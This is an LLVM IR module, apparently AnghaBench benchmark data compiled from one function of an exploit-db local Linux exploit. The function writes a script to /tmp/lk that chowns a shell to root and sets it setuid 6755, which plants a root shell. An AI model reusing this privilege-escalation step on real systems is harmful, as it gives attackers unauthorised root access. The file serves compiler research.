; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/linux/local/extr_20004.c_makeLKregular.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/linux/local/extr_20004.c_makeLKregular.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@.str = private unnamed_addr constant [8 x i8] c"/tmp/lk\00", align 1
@.str.1 = private unnamed_addr constant [2 x i8] c"w\00", align 1
@.str.2 = private unnamed_addr constant [29 x i8] c"#!%s\0A%s .root %s\0A%s 6755 %s\0A\00", align 1
@SHAT = common dso_local global i8* null, align 8
@CHOWNAT = common dso_local global i8* null, align 8
@SHELLAT = common dso_local global i8* null, align 8
@CHMODAT = common dso_local global i8* null, align 8

; Function Attrs: noinline nounwind optnone uwtable
define dso_local void @makeLKregular() #0 {
  %1 = alloca i32*, align 8
  %2 = alloca [1000 x i8], align 16
  %3 = call i32* @fopen(i8* getelementptr inbounds ([8 x i8], [8 x i8]* @.str, i64 0, i64 0), i8* getelementptr inbounds ([2 x i8], [2 x i8]* @.str.1, i64 0, i64 0))
  store i32* %3, i32** %1, align 8
  %4 = getelementptr inbounds [1000 x i8], [1000 x i8]* %2, i64 0, i64 0
  %5 = load i8*, i8** @SHAT, align 8
  %6 = load i8*, i8** @CHOWNAT, align 8
  %7 = load i8*, i8** @SHELLAT, align 8
  %8 = load i8*, i8** @CHMODAT, align 8
  %9 = load i8*, i8** @SHELLAT, align 8
  %10 = call i32 @snprintf(i8* %4, i32 1000, i8* getelementptr inbounds ([29 x i8], [29 x i8]* @.str.2, i64 0, i64 0), i8* %5, i8* %6, i8* %7, i8* %8, i8* %9)
  %11 = load i32*, i32** %1, align 8
  %12 = getelementptr inbounds [1000 x i8], [1000 x i8]* %2, i64 0, i64 0
  %13 = call i32 @fprintf(i32* %11, i8* %12)
  %14 = load i32*, i32** %1, align 8
  %15 = call i32 @fflush(i32* %14)
  %16 = load i32*, i32** %1, align 8
  %17 = call i32 @fclose(i32* %16)
  %18 = call i32 @umask(i32 0)
  %19 = call i32 @chmod(i8* getelementptr inbounds ([8 x i8], [8 x i8]* @.str, i64 0, i64 0), i32 493)
  ret void
}

declare dso_local i32* @fopen(i8*, i8*) #1

declare dso_local i32 @snprintf(i8*, i32, i8*, i8*, i8*, i8*, i8*, i8*) #1

declare dso_local i32 @fprintf(i32*, i8*) #1

declare dso_local i32 @fflush(i32*) #1

declare dso_local i32 @fclose(i32*) #1

declare dso_local i32 @umask(i32) #1

declare dso_local i32 @chmod(i8*, i32) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
